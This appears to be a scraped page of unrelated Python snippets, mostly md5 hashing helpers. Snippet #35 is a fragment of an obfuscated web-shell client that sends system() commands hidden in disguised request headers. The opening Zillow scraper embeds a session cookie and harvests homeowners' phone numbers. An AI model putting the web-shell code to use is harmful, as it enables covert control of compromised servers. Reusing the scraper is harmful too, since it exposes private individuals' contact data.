                'cookie' : 'zguid=23|%2410ab80e6-80db-4e0a-9f70-2449ca972d74; _ga=GA1.2.759159145.1599348167; zjs_user_id=null; zjs_anonymous_id=%2210ab80e6-80db-4e0a-9f70-2449ca972d74%22; _gcl_au=1.1.607943717.1599348169; _pxvid=be9ff2f0-efce-11ea-9652-0242ac12000b; __gads=ID=cab593cad6cbce43:T=1599348200:S=ALNI_MaFYrYCZZvPIITKUEoEDXGvXSRYwQ; _gid=GA1.2.1287304564.1599556314; _pin_unauth=dWlkPU9EUXdZamxrTldJdE9ESTBNUzAwWXprMExXSXdNekl0TkdWak0yWTFNVEE1TldJeSZycD1abUZzYzJV; ki_r=; ki_s=; _fbp=fb.1.1599562363584.1440832488; g_state={"i_p":1599570378147,"i_l":1}; ki_t=1599556892885%3B1599556892885%3B1599563330503%3B1%3B19; JSESSIONID=62F47C1DAFBF00B3DB7B301BEA3E6586; zgsession=1|8840c1ee-f8a6-43d7-9a7b-3169df33c987; _pxff_cc=U2FtZVNpdGU9TGF4Ow==; _pxff_rf=1; _pxff_fp=1; _pxff_bsco=1; _px3=6d722620cec81d0df86c8eff4b631bdd93cef163fb0a14808e80f81013747454:M7trNae6CpAztMArZT97P3Vy9jFLz9FuEZ5p2efYpXeqOJC7Bw+xzsVGxArAYe+PM+vQKNuEI3qytjutx2UEXg==:1000:M1Vo/kdU1lI8Zqky6jJnuwSu45xHxX8ueCLKUiW6KX8rNR+VWAORLQi+1ns4dhilOU7gSCJfJmToj1SeyKN49kHZQZIQ0wSFeFtn+txzkIo/fhFAr2Cq7WvjCVWw7GBx8F3JIjMqHf1BZAAFg0YXqy/IVuCFhvIioSyK35nkm4A=; _gat=1; KruxPixel=true; DoubleClickSession=true; _uetsid=f44fc66ca5c392a6859170ed776b6ae9; _uetvid=dc708dafb2b6d91ab6c6923ac1ae6673; AWSALB=3gLhoP6QCdmf4zskymQ7ej/kbqzRHNkv+QNQMFmS6Y7S9pENaOusdnQVhFHWm1W9z8/1Og/WmO8JK63ys0wmi6ZNwRc4SN8lf4pcoyrm+nj8lLAPLRDIqMaYAEte; AWSALBCORS=3gLhoP6QCdmf4zskymQ7ej/kbqzRHNkv+QNQMFmS6Y7S9pENaOusdnQVhFHWm1W9z8/1Og/WmO8JK63ys0wmi6ZNwRc4SN8lf4pcoyrm+nj8lLAPLRDIqMaYAEte; search=6|1602203173818%7Crb%3DMaricopa%252C-AZ%26rect%3D33.203401%252C-111.882231%252C32.788612%252C-112.512953%26disp%3Dmap%26mdm%3Dauto%26sort%3Ddays%26pt%3Dpmf%252Cpf%26fs%3D1%26fr%3D0%26rs%3D0%26ah%3D0%26singlestory%3D0%26abo%3D0%26garage%3D0%26pool%3D0%26ac%3D0%26waterfront%3D0%26finished%3D0%26unfinished%3D0%26cityview%3D0%26mountainview%3D0%26parkview%3D0%26waterview%3D0%26hoadata%3D1%26zillow-owned%3D0%263dhome%3D0%09%0932697%09%09%09%09%09%09',
                'sec-fetch-dest': 'empty',
                'sec-fetch-mode': 'cors',
                'sec-fetch-site': 'same-origin',
                'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36'
            }
    
    pagination = ""
    usersSearchTerm = "85263"
    west = "-111.7398158178711"
    east = "-111.63063918212892"
    south = "33.683945743230794"
    north = "33.802992604350585"
    regionId = "94855"
    regionType = "7"
    mapZoom = "13"
    includeList = "true"

    # https://www.zillow.com/search/GetSearchPageState.htm?searchQueryState={%22pagination%22:{},%22usersSearchTerm%22:%2285006%22,%22mapBounds%22:{%22west%22:-112.07973577801513,%22east%22:-112.01665022198486,%22south%22:33.43522122804253,%22north%22:33.494937169247144},%22regionSelection%22:[{%22regionId%22:94722,%22regionType%22:7}],%22isMapVisible%22:true,%22mapZoom%22:14,%22filterState%22:{%22sort%22:{%22value%22:%22globalrelevanceex%22}},%22isListVisible%22:true}&includeMap=false&includeList=true

    default_first_url = 'https://www.zillow.com/search/GetSearchPageState.htm?searchQueryState={"pagination":{0},"usersSearchTerm":"{1}","mapBounds":{"west":{2},"east":{3},"south":{4},"north":{5}},"regionSelection":[{"regionId":{6},"regionType":{7}}],"isMapVisible":true,"mapZoom":{8},"filterState":{"sort":{"value":"globalrelevanceex"}},"isListVisible":true}&includeMap=false&includeList={9}'


    first_case_url = 'https://www.zillow.com/search/GetSearchPageState.htm?searchQueryState={"pagination":{' + pagination + '},' + '"usersSearchTerm":"' + usersSearchTerm + '","mapBounds":{"west":' + west + ',"east":' + east + ',"south":' + south + ',"north":' + north + '},"regionSelection":[{"regionId":' + regionId + ',"regionType":' + regionType + '}],"isMapVisible":true,"mapZoom":' + mapZoom + ',"filterState":{"sort":{"value":"globalrelevanceex"}},"isListVisible":true}&includeMap=false&includeList=' + includeList
    

    # first_url = default_first_url.format(pagination, usersSearchTerm, west, east, south, north, regionId, regionType, mapZoom, includeList)
    print(first_case_url)
    # return
    
    default_page_url = 'https://www.zillow.com/search/GetSearchPageState.htm?searchQueryState={"pagination":{"currentPage":' + pagination + '},' + '"usersSearchTerm":"' + usersSearchTerm + '","mapBounds":{"west":' + west + ',"east":' + east + ',"south":' + south + ',"north":' + north + '},"regionSelection":[{"regionId":' + regionId + ',"regionType":' + regionType + '}],"isMapVisible":true,"mapZoom":' + mapZoom + ',"filterState":{"sort":{"value":"globalrelevanceex"}},"isListVisible":true}&includeMap=false&includeList=' + includeList

    counts = 1

    for page in range(1, 6):

        default_page_url = 'https://www.zillow.com/search/GetSearchPageState.htm?searchQueryState={"pagination":{"currentPage":' + str(page) + '},' + '"usersSearchTerm":"' + usersSearchTerm + '","mapBounds":{"west":' + west + ',"east":' + east + ',"south":' + south + ',"north":' + north + '},"regionSelection":[{"regionId":' + regionId + ',"regionType":' + regionType + '}],"isMapVisible":true,"mapZoom":' + mapZoom + ',"filterState":{"sort":{"value":"globalrelevanceex"}},"isListVisible":true}&includeMap=false&includeList=' + includeList

        if page == 1:
            url = first_case_url
        else:
            url = default_page_url

        response = requests.get(url, headers=header)
        result = response.json()
        properties_infos = result["searchResults"]["listResults"]
        print(len(properties_infos))

        for i in range(0, len(properties_infos)):
            data_base = []
            property_url = properties_infos[i]["detailUrl"]
            status_text = properties_infos[i]["statusText"]
            print(status_text, counts)
            counts += 1
            try:
                street_add = properties_infos[i]["hdpData"]["homeInfo"]["streetAddress"]
            except:
                street_add = ""
            
            try:
                city = properties_infos[i]["hdpData"]["homeInfo"]["city"]
            except:
                city = ""
            
            try:
                state = properties_infos[i]["hdpData"]["homeInfo"]["state"]
            except:
                state = ""
            
            try:
                zipcode = properties_infos[i]["hdpData"]["homeInfo"]["zipcode"]
            except:
                zipcode = ""
        
            property_address = street_add + ", " + city + ", " + state + " " + zipcode
            
            
            try:
                bathrooms = properties_infos[i]["hdpData"]["homeInfo"]["bathrooms"]
            except:
                bathrooms = ""
                
            try:
                bedrooms = properties_infos[i]["hdpData"]["homeInfo"]["bedrooms"]
            except:
                bedrooms = ""
            
            try:
                tax_assessed_value = properties_infos[i]["hdpData"]["homeInfo"]["taxAssessedValue"]
            except:
                tax_assessed_value = ""
                
            try:
                zestimate = properties_infos[i]["hdpData"]["homeInfo"]["zestimate"]
            except:
                zestimate = ""
                
            try:
                rent_zestimate = properties_infos[i]["hdpData"]["homeInfo"]["rentZestimate"]
            except:
                rent_zestimate = ""
                
            try:
                home_type = properties_infos[i]["hdpData"]["homeInfo"]["homeType"]
            except:
                home_type = ""
                
                
            if "by owner" in status_text:
                print("--------------------------------------------------> : ", i + 1)
                


                driver.get(property_url)
                time.sleep(10)
                
                try:
                    wait(driver, "//ul[@class='ds-home-fact-list']")
                except:
                    print("There is no xpath")
               
                # street_add = driver.find_element_by_xpath("//h1[@class='ds-address-container']/span[1]").text
                # property_address = street_add + ", " + city + ", " + state + " " + zipcode

                # phone_number = driver.find_element_by_xpath("//span[@class='listing-field']").text
                phones = re.findall(r'[(][\d]{3}[)][ ]?[\d]{3}-[\d]{4}', driver.page_source)
                for phone in range(1, len(phones) + 1):
                    phone_number = phones[phone - 1]
                    
                features_labels = driver.find_elements_by_xpath("//ul[@class='ds-home-fact-list']//span[contains(@class, 'ds-standard-label') and contains(@class, 'ds-home-fact-label')]")
                features_infos = driver.find_elements_by_xpath("//ul[@class='ds-home-fact-list']//span[contains(@class, 'ds-body') and contains(@class, 'ds-home-fact-value')]")
                
                parking = ""
                year_built = ""
                hoa = ""
                heating = ""
                lot = ""
                cooling = ""
                price_sqft = ""
                
                for feature_label, feature_info in zip(features_labels, features_infos):
                    feature_label_txt = feature_label.text
                    
                    if 'Parking' in feature_label_txt:
                        parking = feature_info.text
                    elif 'Year built' in feature_label_txt:
                        year_built = feature_info.text
                    elif 'HOA' in feature_label_txt:
                        hoa = feature_info.text
                    elif 'Heating' in feature_label_txt:
                        heating = feature_info.text
                    elif 'Lot' in feature_label_txt:
                        lot = feature_info.text
                    elif 'Cooling' in feature_label_txt:
                        cooling = feature_info.text
                    elif 'Price/' in feature_label_txt:
                        price_sqft = feature_info.text
                        
                
                    
                print("Property Address--------------------> : ", property_address)
                print("Property Url------------------------> : ", property_url)
                print("Property Status---------------------> : ", status_text)    
                print("Owner Phone Number------------------> : ", phone_number)
                print("BathRooms---------------------------> : ", bathrooms)
                print("BedRooms----------------------------> : ", bedrooms)
                print("Tax Assessed Value------------------> : ", tax_assessed_value)
                print("Zestimate---------------------------> : ", zestimate)
                print("Rent Zestimate----------------------> : ", rent_zestimate)
                print("Home Type---------------------------> : ", home_type)
                print("Parking-----------------------------> : ", parking)
                print("Year Built--------------------------> : ", year_built)
                print("HOA---------------------------------> : ", hoa)
                print("Heating-----------------------------> : ", heating)
                print("Lot---------------------------------> : ", lot)
                print("Cooling-----------------------------> : ", cooling)
                print("Price Sqft--------------------------> : ", price_sqft)
                
               

                string_id = property_address + status_text + phone_number
                m = hashlib.md5()
                m.update(string_id.encode('utf8'))
                identifier = m.hexdigest()
                print("hash-------------------->", identifier)
                create_time = str(datetime.datetime.now())
                update_time = ""

                insertdb = InsertDB()
                data_base.append((property_address, street_add, city, state, zipcode, status_text, phone_number, bathrooms, bedrooms, tax_assessed_value, zestimate, rent_zestimate, home_type, parking, year_built, hoa, heating, lot, cooling, price_sqft, identifier, create_time, update_time))
                insertdb.insert_document(data_base, table_name)
Пример #35
0
# 每次会话会产生一次随机的 Accept-Language
langTmp = choicePart(languages, 3)  # 输出一个列表 , 包含模板中的三种 Accept-language
indexes = sorted(choicePart(range(1, 10), 3),
                 reverse=True)  # 降序排序输出三个权重值 , 例如 [8,6,4]

acceptLang = [defaultLang]  # 先添加默认Language
for i in xrange(3):
    acceptLang.append(langTmp[i] %
                      (indexes[i], ))  # 然后循环添加三种 Accept-Language , 并为其添加权重值
acceptLangStr = ','.join(acceptLang)  # 将多个 Accept-Language 用 " , " 拼接在一起
# acceptLangStr 即为要使用的 Accept-Language
debugPrint(acceptLangStr)

init2Char = acceptLang[0][0] + acceptLang[1][0]  # $i
md5head = (md5(init2Char + keyh).hexdigest())[0:3]  # $h
md5tail = (md5(init2Char + keyf).hexdigest())[0:3] + randAlpha(randint(
    3, 8))  # $f + 填充字符串
debugPrint('$i is %s' % (init2Char))
debugPrint('md5 head: %s' % (md5head, ))
debugPrint('md5 tail: %s' % (md5tail, ))

# 交互式 Shell
cmd = "system('" + raw_input('shell > ') + "');"
while cmd != '':
    # 在写入 Payload 前填充一些无关数据
    query = []
    for i in xrange(max(indexes) + 1 + randint(0, 2)):
        key = randAlpha(randint(3, 6))
        value = base64.urlsafe_b64encode(randBytesFlow(randint(3, 12)))
        query.append((key, value))  # 生成无关数据并填充
Пример #36
0
 def gen_device_id(self):
     return "android-{}".format(
         hashlib.md5(self.gen_uuid().encode("utf-8")).hexdigest()[:16])
Пример #37
0
 def tokenMaker(self):
     m = md5()
     m.update((str(time.time())+self.account).encode("utf-8"))
     token = m.hexdigest()
     return token
Пример #38
0
 def _get_cache_key(self):
     return 'access_token_' + hashlib.md5(
         self.cred.refresh_token.encode('utf-8')).hexdigest()
Пример #39
0
 def __init__(self, euid: str):
     key: bytes = hashlib.md5(f"Salus-{euid.lower()}".encode("utf-8")).digest() + bytes([0] * 16)
     self.cipher = Cipher(algorithms.AES(key), modes.CBC(self.iv), default_backend())
Пример #40
0
def get_unique_str():
    uuid_str = str(uuid.uuid4()).encode('utf-8')
    md5 = hashlib.md5()
    md5.update(uuid_str)
    return md5.hexdigest()
Пример #41
0
 def avatar(self, size):
     digest = md5(self.email.lower().encode('utf-8')).hexdigest()
     return f'https://www.gravatar.com/avatar/{digest}?d=identicon&s={size}'
Пример #42
0
def md5(alpha):
    return hashlib.md5(alpha.encode('utf-8')).hexdigest()
Пример #43
0
def get_md5(pw):
    md5 = hashlib.md5(pw.encode(encoding='utf-8'))
    return md5.hexdigest()
Пример #44
0
import io
import hashlib
import json


# file_content = b"testingtesting"
# file_content = b"testingtesting1"
# file_content = b"testingtesting2"
# file_content = b"testingtesting3"
# file_content = b"testingtesting4"
# FILE_CONTENT = b"testingtesting5"
# FILE_CONTENT = b"testingtesting6"
# FILE_CONTENT = b"testingtesting7"
FILE_CONTENT = b"testingtesting8"
FILE_HASH = hashlib.md5(FILE_CONTENT).hexdigest()


def test_home_page(test_client):
    """
    Testing the home page
    """
    response = test_client.get('/')
    assert response.status_code == 200


def test_upload(test_client):
    """
    Testing the POST request method
    """
    data = {
Пример #45
0
def make_predicates(xhr=None,
                    request_method=None,
                    path_info=None,
                    request_param=None,
                    match_param=None,
                    header=None,
                    accept=None,
                    containment=None,
                    request_type=None,
                    traverse=None,
                    custom=()):

    # PREDICATES
    # ----------
    #
    # Given an argument list, a predicate list is computed.
    # Predicates are added to a predicate list in (presumed)
    # computation expense order.  All predicates associated with a
    # view or route must evaluate true for the view or route to
    # "match" during a request.  Elsewhere in the code, we evaluate
    # predicates using a generator expression.  The fastest predicate
    # should be evaluated first, then the next fastest, and so on, as
    # if one returns false, the remainder of the predicates won't need
    # to be evaluated.
    #
    # While we compute predicates, we also compute a predicate hash
    # (aka phash) that can be used by a caller to identify identical
    # predicate lists.
    #
    # ORDERING
    # --------
    #
    # A "order" is computed for the predicate list.  An order is
    # a scoring.
    #
    # Each predicate is associated with a weight value, which is a
    # multiple of 2.  The weight of a predicate symbolizes the
    # relative potential "importance" of the predicate to all other
    # predicates.  A larger weight indicates greater importance.
    #
    # All weights for a given predicate list are bitwise ORed together
    # to create a "score"; this score is then subtracted from
    # MAX_ORDER and divided by an integer representing the number of
    # predicates+1 to determine the order.
    #
    # The order represents the ordering in which a "multiview" ( a
    # collection of views that share the same context/request/name
    # triad but differ in other ways via predicates) will attempt to
    # call its set of views.  Views with lower orders will be tried
    # first.  The intent is to a) ensure that views with more
    # predicates are always evaluated before views with fewer
    # predicates and b) to ensure a stable call ordering of views that
    # share the same number of predicates.  Views which do not have
    # any predicates get an order of MAX_ORDER, meaning that they will
    # be tried very last.

    predicates = []
    weights = []
    h = md5()

    if xhr:

        def xhr_predicate(context, request):
            return request.is_xhr

        xhr_predicate.__text__ = "xhr = True"
        weights.append(1 << 1)
        predicates.append(xhr_predicate)
        h.update(bytes_('xhr:%r' % bool(xhr)))

    if request_method is not None:
        if not is_nonstr_iter(request_method):
            request_method = (request_method, )
        request_method = sorted(request_method)

        def request_method_predicate(context, request):
            return request.method in request_method

        text = "request method = %s" % repr(request_method)
        request_method_predicate.__text__ = text
        weights.append(1 << 2)
        predicates.append(request_method_predicate)
        for m in request_method:
            h.update(bytes_('request_method:%r' % m))

    if path_info is not None:
        try:
            path_info_val = re.compile(path_info)
        except re.error as why:
            raise ConfigurationError(why.args[0])

        def path_info_predicate(context, request):
            return path_info_val.match(request.path_info) is not None

        text = "path_info = %s"
        path_info_predicate.__text__ = text % path_info
        weights.append(1 << 3)
        predicates.append(path_info_predicate)
        h.update(bytes_('path_info:%r' % path_info))

    if request_param is not None:
        request_param_val = None
        if '=' in request_param:
            request_param, request_param_val = request_param.split('=', 1)
        if request_param_val is None:
            text = "request_param %s" % request_param
        else:
            text = "request_param %s = %s" % (request_param, request_param_val)

        def request_param_predicate(context, request):
            if request_param_val is None:
                return request_param in request.params
            return request.params.get(request_param) == request_param_val

        request_param_predicate.__text__ = text
        weights.append(1 << 4)
        predicates.append(request_param_predicate)
        h.update(
            bytes_('request_param:%r=%r' % (request_param, request_param_val)))

    if header is not None:
        header_name = header
        header_val = None
        if ':' in header:
            header_name, header_val = header.split(':', 1)
            try:
                header_val = re.compile(header_val)
            except re.error as why:
                raise ConfigurationError(why.args[0])
        if header_val is None:
            text = "header %s" % header_name
        else:
            text = "header %s = %s" % (header_name, header_val)

        def header_predicate(context, request):
            if header_val is None:
                return header_name in request.headers
            val = request.headers.get(header_name)
            if val is None:
                return False
            return header_val.match(val) is not None

        header_predicate.__text__ = text
        weights.append(1 << 5)
        predicates.append(header_predicate)
        h.update(bytes_('header:%r=%r' % (header_name, header_val)))

    if accept is not None:

        def accept_predicate(context, request):
            return accept in request.accept

        accept_predicate.__text__ = "accept = %s" % accept
        weights.append(1 << 6)
        predicates.append(accept_predicate)
        h.update(bytes_('accept:%r' % accept))

    if containment is not None:

        def containment_predicate(context, request):
            return find_interface(context, containment) is not None

        containment_predicate.__text__ = "containment = %s" % containment
        weights.append(1 << 7)
        predicates.append(containment_predicate)
        h.update(bytes_('containment:%r' % hash(containment)))

    if request_type is not None:

        def request_type_predicate(context, request):
            return request_type.providedBy(request)

        text = "request_type = %s"
        request_type_predicate.__text__ = text % request_type
        weights.append(1 << 8)
        predicates.append(request_type_predicate)
        h.update(bytes_('request_type:%r' % hash(request_type)))

    if match_param is not None:
        if isinstance(match_param, string_types):
            match_param, match_param_val = match_param.split('=', 1)
            match_param = {match_param: match_param_val}
        text = "match_param %s" % match_param

        def match_param_predicate(context, request):
            for k, v in match_param.items():
                if request.matchdict.get(k) != v:
                    return False
            return True

        match_param_predicate.__text__ = text
        weights.append(1 << 9)
        predicates.append(match_param_predicate)
        h.update(bytes_('match_param:%r' % match_param))

    if custom:
        for num, predicate in enumerate(custom):
            if getattr(predicate, '__text__', None) is None:
                text = '<unknown custom predicate>'
                try:
                    predicate.__text__ = text
                except AttributeError:
                    # if this happens the predicate is probably a classmethod
                    if hasattr(predicate, '__func__'):
                        predicate.__func__.__text__ = text
                    else:  # pragma: no cover ; 2.5 doesn't have __func__
                        predicate.im_func.__text__ = text
            predicates.append(predicate)
            # using hash() here rather than id() is intentional: we
            # want to allow custom predicates that are part of
            # frameworks to be able to define custom __hash__
            # functions for custom predicates, so that the hash output
            # of predicate instances which are "logically the same"
            # may compare equal.
            h.update(bytes_('custom%s:%r' % (num, hash(predicate))))
        weights.append(1 << 10)

    if traverse is not None:
        # ``traverse`` can only be used as a *route* "predicate"; it
        # adds 'traverse' to the matchdict if it's specified in the
        # routing args.  This causes the ResourceTreeTraverser to use
        # the resolved traverse pattern as the traversal path.
        from pyramid.urldispatch import _compile_route
        _, tgenerate = _compile_route(traverse)

        def traverse_predicate(context, request):
            if 'traverse' in context:
                return True
            m = context['match']
            tvalue = tgenerate(m)
            m['traverse'] = traversal_path_info(tvalue)
            return True

        # This isn't actually a predicate, it's just a infodict
        # modifier that injects ``traverse`` into the matchdict.  As a
        # result, the ``traverse_predicate`` function above always
        # returns True, and we don't need to update the hash or attach
        # a weight to it
        predicates.append(traverse_predicate)

    score = 0
    for bit in weights:
        score = score | bit
    order = (MAX_ORDER - score) / (len(predicates) + 1)
    phash = h.hexdigest()
    return order, predicates, phash
Пример #46
0
def GetUniqueHashFromString(string_):
    return hashlib.md5(string_.encode('utf-8')).hexdigest()
Пример #47
0
def gravatar_url(email, size=80):
    """Return the gravatar image for the given email address."""
    return 'http://www.gravatar.com/avatar/%s?d=identicon&s=%d' % \
        (md5(email.strip().lower().encode('utf-8')).hexdigest(), size)
 def get_md5(file_path):
     hash = hashlib.md5()
     with open(file_path, "rb") as f:
         for chunk in iter(lambda: f.read(4096), b""):
             hash.update(chunk)
     return hash.hexdigest()
Пример #49
0
 def avatar(self,size):
     digest = md5(self.email.lower().encode('utf-8')).hexdigest()
     return 'https://www.gravatar.com/avatar/{}?d=identicon&s={}'.format(
         digest, size)
Пример #50
0
    string_types,
    bytes_,
    is_nonstr_iter,
)

from pyramid.exceptions import ConfigurationError

from pyramid.traversal import (
    find_interface,
    traversal_path_info,
)

from hashlib import md5

MAX_ORDER = 1 << 30
DEFAULT_PHASH = md5().hexdigest()


@implementer(IActionInfo)
class ActionInfo(object):
    def __init__(self, file, line, function, src):
        self.file = file
        self.line = line
        self.function = function
        self.src = src

    def __str__(self):
        srclines = self.src.split('\n')
        src = '\n'.join('    %s' % x for x in srclines)
        return 'Line %s of file %s:\n%s' % (self.line, self.file, src)
Пример #51
0
 def __calculate_md5(self, fpath, chunk_size=1024 * 1024):  # pylint: disable=no-self-use
     md5 = hashlib.md5()
     with open(fpath, 'rb') as f:
         for chunk in iter(lambda: f.read(chunk_size), b''):
             md5.update(chunk)
     return md5.hexdigest()
Пример #52
0
def get_md5(url):
    if isinstance(url, str):
        url = url.encode('utf-8')
    m = hashlib.md5()
    m.update(url)
    return m.hexdigest()
Пример #53
0
def copy_site(auth, server, secureSSL, source_site, destination_site, get):
    """Perform the actual copy of content (fixlets) from SRC
	to DEST sites"""

    # find fixlet candidates to copy
    print "Finding copy candidates from SOURCE."
    r = get(server + 'api/fixlets/%s/%s' % (source_site[1], source_site[0]))
    r = BeautifulSoup(r.text)

    fixlets = []
    for fixlet in r.find_all('fixlet'):
        if len(fixlets) > FIXLET_LIMIT:
            break
        fixlets.append(
            (fixlet.find('name').text, fixlet['resource'], fixlet.id.text))

    # find fixlets already on dest
    dest_fixlets_hash = dict()
    if os.path.isfile(FIXLET_HASH_FILE_PATH) and \
     os.path.getmtime(FIXLET_HASH_FILE_PATH) + CACHE_TIME > time.time():
        # use our fixlet hashes cache!
        dest_fixlets_hash = read_fixlet_hashes()

    if not dest_fixlets_hash:  # if read_fixlet_hashes() read empty file, or no file existed
        print "Enumerating existing fixlets on DEST."
        r = get( server+'api/fixlets/%s/%s'% \
         (destination_site[1], destination_site[0]))
        r = BeautifulSoup(r.text)

        dest_fixlets = []
        for fixlet in r.find_all('fixlet'):
            dest_fixlets.append(
                (fixlet.find('name').text, fixlet['resource'], fixlet.id.text))

        dest_fixlets_hash = dict(
        )  # a set of hashes.. lul cuz each fixlet is mem large
        fixlet_count = 0
        for fixlet_name, fixlet_url, fixlet_id in dest_fixlets:
            fixlet_count += 1
            if fixlet_count > FIXLET_LIMIT:
                break
            r = get(fixlet_url)

            # fixlets timestamp themselves, so we'll cut that out to find dupes'
            content_scrubbed = scrub_fixlet(r.content)

            fixlet_hash = hashlib.md5(content_scrubbed).hexdigest()
            if fixlet_hash in dest_fixlets_hash:
                # found a duplicate, delete it
                print "Found duplicate fixlets on DEST: ID", fixlet_id, \
                 "which duplicates", dest_fixlets_hash[fixlet_hash]
                print "Deleting duplicate..."
                deleter = requests.delete(fixlet_url,
                                          auth=auth,
                                          verify=secureSSL)
                if deleter.status_code != 200:
                    print "Unable to delete fixlet", fixlet_id, "!!"
            else:
                dest_fixlets_hash[fixlet_hash] = fixlet_id
    else:
        print "Using %s to check for existing fixlets." % FIXLET_HASH_FILE_PATH

    # copy the new fixlets from src to dest
    print "Begin copying fixlets."
    total_kib_copied = 0
    for fixlet_name, fixlet_url, fixlet_id in fixlets:
        r = get(fixlet_url)

        content_scrubbed = scrub_fixlet(r.content)
        fixlet_hash = hashlib.md5(content_scrubbed).hexdigest()

        if fixlet_hash in dest_fixlets_hash:
            # dest has this one already, skip it
            print "Found fixlet", fixlet_id, "from SOURCE already in DEST," \
             "skipping..."
            continue

        print "Copying", fixlet_id, ":", fixlet_name, repr(
            hashlib.md5(r.content).hexdigest())

        postr = requests.post( server+'api/fixlets/%s/%s'% \
         (destination_site[1], destination_site[0]), # /type/name
         data = r.content,
         auth = auth,
         verify = secureSSL )
        postr = BeautifulSoup(postr.content)
        fixlet_dest_id = postr.find('id').text
        dest_fixlets_hash[fixlet_hash] = fixlet_dest_id

        print sys.getsizeof(r.content) / 1024.0, "KiB copied"
        total_kib_copied += sys.getsizeof(r.content) / 1024.0
    print total_kib_copied, "KiB in total copied"

    save_fixlet_hashes(dest_fixlets_hash)
Пример #54
0
def _derive_key_and_iv(password, salt, key_length, iv_length):
    d = d_i = ''
    while len(d) < key_length + iv_length:
        d_i = md5(d_i + password + salt).digest()
        d += d_i
    return d[:key_length], d[key_length:key_length+iv_length]
Пример #55
0
from yui.utils import json

from ...util import FakeBot

result_pattern_re = re.compile(
    r".+? 기준으로 가장 근접한 관측소의 \d{4}년 \d{2}월 \d{2}일 \d{2}시 계측 자료에요.\n\n"
    r"\* 종합 AQI: \d+(?:\.\d+)? - (?:좋음|보통|민감군 영향|나쁨|매우 나쁨|위험)\(.+?\)\n"
    r"\* PM2\.5: \d+(?:\.\d+)? \(최소 \d+(?:\.\d+)? / 최대 \d+(?:\.\d+)?\)\n"
    r"\* PM10: \d+(?:\.\d+)? \(최소 \d+(?:\.\d+)? / 최대 \d+(?:\.\d+)?\)\n"
    r"\* 오존: \d+(?:\.\d+)? \(최소 \d+(?:\.\d+)? / 최대 \d+(?:\.\d+)?\)\n"
    r"\* 이산화 질소: \d+(?:\.\d+)? \(최소 \d+(?:\.\d+)? / 최대 \d+(?:\.\d+)?\)\n"
    r"\* 이산화 황: \d+(?:\.\d+)? \(최소 \d+(?:\.\d+)? / 최대 \d+(?:\.\d+)?\)\n"
    r"\* 일산화 탄소: \d+(?:\.\d+)? \(최소 \d+(?:\.\d+)? / 최대 \d+(?:\.\d+)?\)")

addr1 = "부천"
addr1_md5 = md5(addr1.encode()).hexdigest()
addr2 = "서울"
addr2_md5 = md5(addr2.encode()).hexdigest()


@pytest.fixture(scope="module")
def event_loop():
    loop = asyncio.new_event_loop()
    yield loop
    loop.close()


@pytest.fixture()
def aqi_api_token():
    token = os.getenv("AQI_API_TOKEN")
    if not token:
Пример #56
0
def calc_hexdigest(s):
    """Return md5 digest for a string."""
    s = compat.to_bytes(s)
    return md5(s).hexdigest()  # return native string
Пример #57
0
def md5sum(fn):
    md5 = hashlib.md5()
    with open(fn, 'rb') as f:
        for chunk in iter(lambda: f.read(8192), b""):
            md5.update(chunk)
    return md5.hexdigest()
Пример #58
0
 def ErrorHash(self):
   return int(hashlib.md5(self._suppression).hexdigest()[:16], 16)
Пример #59
0
 def md5(text):
     return hashlib.md5(text.encode('utf-8')).hexdigest()
Пример #60
0
def run(API, environ, indata, session):

    # We need to be logged in for this!
    if not session.user:
        raise API.exception(403, "You must be logged in to use this API endpoint! %s")

    now = time.time()

    # First, fetch the view if we have such a thing enabled
    viewList = []
    if indata.get("view"):
        viewList = session.getView(indata.get("view"))
    if indata.get("subfilter"):
        viewList = session.subFilter(indata.get("subfilter"), view=viewList)

    dateTo = indata.get("to", int(time.time()))
    dateFrom = indata.get(
        "from", dateTo - (86400 * 30 * 6)
    )  # Default to a 6 month span

    interval = indata.get("interval", "month")
    xtitle = None

    ####################################################################
    ####################################################################
    dOrg = session.user["defaultOrganisation"] or "apache"
    query = {
        "query": {
            "bool": {
                "must": [
                    {"range": {"created": {"from": dateFrom, "to": dateTo}}},
                    {"term": {"organisation": dOrg}},
                ]
            }
        }
    }
    # Source-specific or view-specific??
    if indata.get("source"):
        query["query"]["bool"]["must"].append(
            {"term": {"sourceID": indata.get("source")}}
        )
    elif viewList:
        query["query"]["bool"]["must"].append({"terms": {"sourceID": viewList}})
    if indata.get("email"):
        query["query"]["bool"]["must"].append(
            {"term": {"creator": indata.get("email")}}
        )
        xTitle = "People closing %s's issues" % indata.get("email")

    # Get top 25 committers this period
    query["aggs"] = {
        "committers": {"terms": {"field": "creator", "size": 25}, "aggs": {}}
    }
    res = session.DB.ES.search(
        index=session.DB.dbname, doc_type="forum_post", size=0, body=query
    )

    people = {}
    for bucket in res["aggregations"]["committers"]["buckets"]:
        email = bucket["key"]
        count = bucket["doc_count"]
        sha = email
        if session.DB.ES.exists(index=session.DB.dbname, doc_type="person", id=sha):
            pres = session.DB.ES.get(
                index=session.DB.dbname, doc_type="person", id=email
            )
            person = pres["_source"]
            person["name"] = person.get("name", "unknown")
            people[email] = person
            people[email]["gravatar"] = hashlib.md5(
                person.get("email", "unknown").encode("utf-8")
            ).hexdigest()
            people[email]["count"] = count

    topN = []
    for email, person in people.items():
        topN.append(person)
    topN = sorted(topN, key=lambda x: x["count"], reverse=True)
    JSON_OUT = {
        "topN": {"denoter": "replies posted", "items": topN},
        "okay": True,
        "responseTime": time.time() - now,
        "widgetType": {"chartType": "bar", "title": xtitle},
    }
    yield json.dumps(JSON_OUT)